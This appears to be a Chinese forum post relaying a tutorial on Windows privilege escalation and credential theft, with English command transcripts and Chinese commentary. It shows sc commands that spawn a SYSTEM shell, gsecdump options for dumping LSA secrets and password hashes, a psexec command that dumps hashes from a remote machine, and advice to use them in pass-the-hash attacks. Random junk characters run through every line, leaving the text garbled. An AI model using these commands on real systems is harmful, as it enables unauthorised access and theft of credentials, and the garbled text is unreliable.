o get a DOS Prompt as NT system:
# u; z6 D9 z4 A& L2 ]; r
, a. Q( X* J' B, L: P8 @5 \2 ~! sC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
4 C3 X" S2 g( @! J& @* J, c[SC] CreateService SUCCESS% N0 l% u4 l/ f0 i
) J" \/ T6 C9 A8 q5 ]' J7 w
C:\>sc start shellcmdline
+ n" m8 D7 ^8 H8 f9 {, r[SC] StartService FAILED 1053:+ r) C# x1 I& {/ r o
1 R" q9 B% u/ u; \6 ~ H; t m a
The service did not respond to the start or control request in a timely fashion.
1 O$ ^9 D8 j5 a ]3 K# C W
3 s5 g% Y% Y% b6 c/ J# \7 \/ ~+ nC:\>sc delete shellcmdline, ~& K4 R/ @ Y2 ]
[SC] DeleteService SUCCESS8 l2 q4 w6 u9 q3 }% p
* ^. E. |' w3 R------------
9 Y7 e1 `8 Z; E( W, p# x9 D# s2 z4 c1 } A t
Then in the new DOS window: U3 l: [) m! ]2 {
* b0 w2 S9 e* k
Microsoft Windows XP [Version 5.1.2600]
, X; p" k6 c$ z* K(C) Copyright 1985-2001 Microsoft Corp.: N" b" X# d$ V+ S
/ R" @$ Y- p* c) X1 J
C:\WINDOWS\system32>whoami! v9 ~% Z; {$ C' _3 h. V7 S- `
NT AUTHORITY\SYSTEM
8 P3 C7 N; k9 [: k& U! g3 E
4 h7 ], l& K, X" dC:\WINDOWS\system32>gsecdump -h
9 }3 m; Q9 Q# x$ F2 c1 ngsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
! p% p6 M l. U5 @8 R2 Z# |" b' husage: gsecdump [options]! ]; { y# e( H% M& [+ H
; W( d- n1 a) X" r/ ^9 moptions:
5 A# w* g4 @) O$ }) q. C1 i-h [ --help ] show help {% f {+ N+ o
-a [ --dump_all ] dump all secrets
, S! @* g3 `! g+ H1 u( c-l [ --dump_lsa ] dump lsa secrets! t, H, |7 g7 t3 F) l: o( n
-w [ --dump_wireless ] dump microsoft wireless connections3 ]* g3 A8 r/ J
-u [ --dump_usedhashes ] dump hashes from active logon sessions, S+ w3 y1 m1 y
-s [ --dump_hashes ] dump hashes from SAM/AD7 d0 B2 N& B; h+ W* G0 v
; T. V% P# K6 X/ u8 |+ wAlthough I like to use:9 E. M& t$ ]$ Z6 [+ G& T
' S* F3 \5 @3 _2 s( @+ q
PsExec v1.83 - Execute processes remotely; t; F2 I6 Y2 D7 `+ r! g8 R
Copyright (C) 2001-2007 Mark Russinovich2 q0 B, j3 u7 F: ]! T5 W
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
2 T7 F3 B; Z& ]# I9 {
, ` P5 J: }; t$ k8 aC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT+ Y; U8 H6 B% d
( H+ F7 c' _$ [" W
to get the hashes from active logon sessions of a remote system.% o, h2 u0 E0 Z
" b/ \1 C+ Y" C& m; a# rThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
2 H' C* f0 b( V E
% h5 W! S( y x3 b" v提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
+ ^" }8 k# {" ~- o/ F" c* d# N5 r原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]+ F) h+ X& e* P- d9 R3 _
7 `9 f! s" B) a6 N2 A1 P0 N
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
' @# A: S2 x! }7 @: k |
发表于 2012-11-6 21:09:29
收藏
支持
反对